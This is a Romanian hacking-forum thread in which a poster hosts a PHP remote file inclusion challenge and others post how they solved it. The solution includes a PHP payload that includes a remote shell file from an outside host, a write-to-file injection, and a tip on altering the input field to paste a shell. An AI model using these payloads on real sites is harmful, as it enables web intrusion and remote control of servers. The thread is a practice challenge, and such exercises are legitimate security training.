Jump to content
amprenta

very easy hack me (php)

Recommended Posts

target : http://pandurii.evonet.ro/rfi.php

realizati un RFI (exprimare de kkt )- o sa primiti o eroare ca n-am gasit host free pe care sa mearga ..ma rog ;)

Ma intereseaza "tactica" voastra .

Ca sa fie totusi mai palpitant daca v-ati prins cum vine aveti un fisier numit spuma.txt , acolo adaugati numele voastru .

Daca credeti ca ati reusit dati un PM sa vedem ce ati facut :)

Good luck ..

Link to comment
Share on other sites

Rezolvare :

Realizati RFI - "faci post la <? include ("http://www.sugete.ro/shell.txt?"); ?>" (flama)

Adaugati numele in spuma.txt - <?php $tw8 = fopen ("spuma.txt", "w+");fwrite($tw8, "tw8's in the game :) "); (tw8)

..si ceilalti au facut la fel

Cam asta trebuia sa faceti , nu a fost greu mai ales ca nu sa se filtreaza aproape nimic .

Link to comment
Share on other sites

auzi sharingad, amprenta vrea un challenge de la tine

edit: ahh, o metoda pe care am folosit-o a fost sa modific pagina o data ce a fost incarcata (cu webdeveloper plugin)

si am transformat din input type="text" in textarea care iti permite sa faci paste pe mai multe linii, si astfel unui shell daca doresti :). si submit.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...